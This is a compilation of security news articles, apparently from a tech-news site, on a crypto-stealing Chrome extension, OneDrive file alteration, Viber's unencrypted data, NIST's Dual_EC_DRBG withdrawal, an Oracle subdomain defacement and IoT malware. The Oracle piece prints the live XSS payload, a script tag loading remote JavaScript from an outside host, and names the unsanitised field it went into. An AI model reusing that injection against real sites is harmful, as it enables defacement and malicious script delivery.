Malicious Chrome Browser Extension Hijacks CryptoCurrency and Online Wallets
Although the number of malicious browser extensions has significantly increased in the past years, but recently a new extension of the Google Chrome is allegedly targeting Cryptocurrency users that is capable of stealing Bitcoins and other crypto coins silently.

The malicious Chrome browser extension dubbed as ‘Cryptsy Dogecoin (DOGE) Live Ticker’ which is available on Chrome Web store for free downloads and developed by "TheTrollBox" account. Reddit user noticed that the updated version of the extension has a malicious code, which is designed to hijack the crypto currency transactions.

HOW CHROME EXTENSION STEALS CRYPTOCURRENCY
It is very obvious that the kind of crypto related software extensions is downloaded only by the users who deal with the digital currency. So, once the user installed the malicious extension, the software within the extension starts monitoring users’ web activity and looks for those users who go to Cryptocurrency exchange sites such as Coinbase and MintPal.

After realizing that the user is performing a transaction in digital coins, the malicious extension replaces the receiving address, where the user is trying to transfer his Cryptocurrency, with the a different BTC address of its own (attacker's bitcoin address) 

The same happened to a Reddit user, who had been reported this activity from the Cryptocurrency exchange MintPal in a withdrawal confirmation. After then he posted a Warning about the rogue extension on Reddit, advising all to “Be careful of what you install on your devices you use to access your wallets.”
OTHER CHROME EXTENSIONS FROM SAME DEVELOPER
TheTrollBox, the developer of malicious 'Cryptsy Dogecoin (DOGE) Live Ticker' Chrome extension has also developed 21 more similar extensions, which are currently available on Google Chrome Store. These Chrome extensions  also could be susceptible to have malicious code, so if you have installed any of the followings extensions, then you should remove them as soon as possible:
MALWARE vs DIGITAL COINS
As the business has moved to greater use of mobile and non-Windows computers, so cyber criminals have adapted techniques monetize their efforts. Due to an increase in the value of digital coins, cyber criminals has added it in their watchlist and making every effort to steal your virtual money.

We have seen Android malware distributed by cyber criminals on Google play store that have hidden Coinkrypt malware, which had capability to turn your mobile device into crypto-currency miners, also cyber criminals spreading malware through Home appliances in order to mine virtual currencies, and now they are started editing software extensions with malicious codes to grab users digital coins.

PROTECT YOUR WALLETS
Users are advised to choose a Crypto currency exchange or wallet service that enables two-factor authentication for the high level of security of their virtual wallets, as two-factor authentication required more than one device, which will eventually decrease the chances of malicious malware modifying changes to your transactions.

Microsoft OneDrive Secretly modifying Your BackUp Files
Until now, our privacy has been violated by many big Internet Services, including Google who uses our personal information for the advertising purposes and this is exactly how the companies handle the mass of personal data we provide them. But, recent report about another big giant Microsoft shows that it omits almost all other privacy aspects, as it targets ‘Integrity’ of our data.

To hold on our large data, having backups is always a good idea and many of us prefer cloud-based backup solutions such as Google Drive, Dropbox, Box, RapidShare, Amazon Cloud Drive to store and secure our personal data. But, unfortunately with Microsoft OneDrive storage service, it doesn’t work.

Microsoft fails to deliver integrity to its users as Microsoft's OneDrive for Business cloud-based storage service has been modifying users' files when they are uploading to Cloud storage, according to an Ireland based Storage technology researcher Seán Byrne, who posted about it in a Myce blog post.
Microsoft OneDrive Secretly modifying Your BackUp Files
This is not with all Cloud storage services as Byrne tested Google Docs, DropBox, and even the consumer version of OneDrive, and found no modifications or changes in the files synced between local and Cloud sources, which implies that the files stored on the cloud and the original files were exactly the same with no alteration.
Microsoft OneDrive Secretly modifying Your BackUp Files
However, the same is not with the case of Microsoft’s OneDrive for Business, he found that the stored files were different from the original one. He created some test PHP and HTML files and was able to verify that OneDrive altered these files with new code during syncing.

To test if this was a when-off error, he used MD5summer tool to create MD5 hashes of synced content and discovered that most of the files returned “Checksum did not match” errors, as Microsoft is injecting uniquely identifiable code into some files.

Why Microsoft is altering files on OneDrive for Business, is not documented anywhere by the company, but the revelation has again raised doubts about the integrity with Microsoft.

Meanwhile, learn how you can encrypt your files before uploading them to any Cloud Storage.

Viber's Poor Data Security Practices Threaten User Privacy
Last week we reported a critical vulnerability in the world's most popular messaging application WhatsApp, that could expose users’ GPS location data to hackers and was discovered by the researchers at UNH Cyber Forensics Research & Education Group.

Same Group of researchers reported new set of vulnerabilities in another most popular messaging application ‘VIber’. They claimed that Viber's poor data security practices threaten privacy of its more than 150 million active users.

Cross Platform messaging app Viber allows registered users to share text messages, images, doodles, GPS Location and videos with each other, along with its popular free voice calling feature which is available for Android, iOS, Windows Phone, Blackberry and Desktops as well.

The researchers found that users' data stored on the Viber Amazon Servers including images and videos are stored in an unencrypted form that could be easily accessed without any authentication i.e.which gives leverage to an attacker to simply visiting the intercepted link on a website for the complete access to the data.
Viber's Poor Data Security Practices Threaten User Privacy
In a video, the researchers demonstrated that viber is not encrypting any data such as images, doodles, videos and location images while exchanging it with their Amazon server, that allows an attacker to capture this unencrypted traffic with man-in-the middle attack.
The main issue is that the above-mentioned data is unencrypted, leaving it open for interception through either a Rogue AP, or any man-in-the middle attacks,” the researcher wrote in the blog post.

An attacker can use any network testing tool such as NetworkMiner, Wireshark, and NetWitness to capture the traffic during man-in-the-middle attack.
"Anyone, including the service providers will be able to collect this information – and anyone that sets up a rogue AP, or any man-in-the middle attacks such as ARP poisoning will be able to capture this unencrypted traffic and view the images and videos received as well as the locations being sent or received by a phone." Professor Ibrahim Baggili, and Jason Moore said.
In Whitehat style, researchers had already reported the vulnerabilities to the Viber team before publishing their findings to the blog, but haven't received any response yet.

It is important to let the people know of these vulnerabilities, therefore, we chose to publish these results and the video in this post,” they wrote.

NIST Removes Dual_EC_DRBG Random Number Generator from Recommendations
The National Institute of Standards and Technology (NIST) has announced to abandon the controversial Dual Elliptic Curve Deterministic Random Bit Generator, better known as Dual_EC_DRBG in the wake of allegations that the National Security Agency.

Back in December, Edward Snowden leaks revealed that RSA received $10 million bribe from NSA under a secret contract to implement their flawed cryptographic algorithm Dual_EC_DRBG in its bSafe Security tool as the default protocol in its products for keeping Encryption Weak.

In response to the accusations on NSA and RSA, and despite RSA denied all the accusations. without wasting time NIST issued an announcement recommending against using Dual_EC_DRBG and abandon the cryptographic algorithm from its revised guidance provided in the Recommendation for Random Number Generation Using Deterministic Random Bit Generators (NIST Special Publication 800-90A, Rev.1).

But it didn't remove it from its random number generator recommendations so that researchers could further examine the encryption standard and its overall strength.

We want to assure the IT cyber security community that the transparent, public process used to rigorously vet our standards is still in place. NIST would not deliberately weaken a cryptographic standard,” NIST officials stated previously.

If vulnerabilities are found in these or any other NIST standards, we will work with the cryptographic community to address them as quickly as possible.”

NIST also recommended users who are still working with Dual EC random number generator to move on to any of the three remaining approved algorithms in the publication like Hash_DRBG, HMAC_DRBG, or CTR_DRBG.

There is something important for vendors too: NIST recommends the vendors currently using Dual_EC_DRBG in their products but want to remain in compliance with federal guidance should select an alternative algorithm and not wait for further revision of the revised document and they also provided a list of cryptographic modules including Dual_EC_DRBG.

Most of these modules implement more than one random number generator. In some cases, the Dual_EC_DRBG algorithm may be listed as included in a product, but another approved algorithm may be used by default,” NIST said. “If a product uses Dual_EC_DRBG as the default random number generator, it may be possible to reconfigure the product to use a different default algorithm.

NIST is seeking final public comments on the Special Publication 800-90A of its Recommendation for Random Number Generation Using Deterministic Random Bit Generators document until May 23, 2014, by then the public comment period will close.

ORACLE Subdomain Defaced using JavaScript Injection
A group of Indian Hackers dubbed as I-HOS TEAM has successfully defaced a page on the sub domain of Oracle Corporation, biggest provider of enterprise software, computer hardware and Services.

The users visiting the domain are being greeted with a custom webpage with black background and the theme song of an Indian Movie “BOSS”. The defacement page is displaying a logo with title “IHOS - Indian Hackers Online Squad” with a quotation for all the Indian hackers shows, “LOVE TO ALL INDIAN HACKERS OUT THERE.

Neither the website nor the server was actually compromised, but the Hacker going by online alias ‘Bl@Ck Dr@GoN’, actually found a page on the Oracle website that allows him to inject HTML/JavaScript code into the Oracle University Electronic Attendance webpage in order to modify the content, as shown in the screenshot provided to The Hacker News:
ORACLE Subdomain Defaced using JavaScript Injection
Hacker told THN that anyone is able to edit the Student name on the website and can insert any code, which is not sanitized properly by the Oracle website. This is awful to see that World’s biggest programming and Software company failed to protect their website from very basic Cross Site Scripting vulnerability.
Defaced Link: Click Here
Injected Javascript: <script src=http://oppwnjms.loomhost.com/bd1.js></script>
At the time of writing, the website was defaced and in case it got fixed, users may check the defaced website’s mirror at Zone-H.

In most of the cases, a hacker look to promote a specific cause when defacing a high profile site, but in this case there seems to have no specified reason to deface the web page. We mostly have seen the defacement of website by the hackers lifting boring messages like “Hello World” or similar, but this is the first time when Oracle Web page is sounding Yo Yo Honey Singh’s beat-full Song.

Desktop Viruses Coming to Your TV and Connected Home Appliances
Since Smart Devices are growing at an exponential rate and so are the threats to them. After your Computers, Servers, Routers, Mobiles and Tablets, now its turn of your Smart TVs, as the desktop viruses are coming to infect your Internet enabled Televisions, warns Eugene Kaspersky the co-founder and chief executive of the world’s fourth largest computer antivirus company, Kaspersky Lab.

As the increase in the manufactures of Smart TVs by different companies, it could be estimated that by 2016, over 100 million TVs are expected to be connected to the Internet and in the time it may rise as a profitable fruit for the malware authors and cyber criminals to exploit these devices.

The 48 year-old Eugene Kaspersky, one of the world’s top technology security experts has has thrown light on the future of Computer Security and warned that Internet of Things (IoT) such as TVs, Refrigerators, Microwave or dishwashers will necessarily bring undesirable cyber threats to your home environment, because any device connected to the Internet is vulnerable and can be infected.

The threats will diversify to mobile phones and to the home environment, such as through televisions, which are now connected to the Internet,” he said in an interview with the Telegraph.

The Internet of Things is said to be the next evolutionary step in our connected world that has been already become a major target for cyber criminals.

We have reported before that how 100,000 Refrigerators and other smart household appliances were compromised by hackers to send out 750,000 malicious spam emails; A Linux worm 'Linux.Darlloz' is hijacking Home Routers, Set-top boxes, Security Cameras, printers to mine Crypto Currencies like Bitcoin.

So, the malicious software that already caused damages to your desktops, laptops and targeted your mobile devices till now, is ready to cause harm to your Smart TVs and other Internet connected smart devices.

Kaspersky said his company’s global research and development headquarters in Moscow is receiving around 315,000 suspicious activity reports on daily basis, that has doubled over the past year. The threats might crawl to the new sectors other than mobile phones and computer systems.

There are millions of attacks a year on Microsoft Windows, thousands on mobile phones, mostly on Android, and dozens on Apple’s iOS. But more and more engineers are developing software for Android,” he said. 

But according to him “technically it is possible to infect millions of devices” because all devices are vulnerable and it is very much possible to see cyber criminals developing viruses for iOS devices.

The fact that I really like what he says, “What’s the difference been a TV and a computer? A bigger screen and a remote control. It has Android inside and memory chips and Internet connections. That’s all.” Well said!

He also warned users that as the Internet of Things (IoTs) increases, users need to have top security packages installed on their devices.

It’s just a question of time. We already have a product for mobile and we have a prototype for TV so we are ready to address this issue when new malware for television is released by criminals.”

In the last few years, this emerging domain for the Internet of Things has been attracting the significant interest, and will continue for the years to come. It would be a $20 Trillion Market over the next several years, but Security and privacy are the key issues for such applications, and still face some enormous challenges.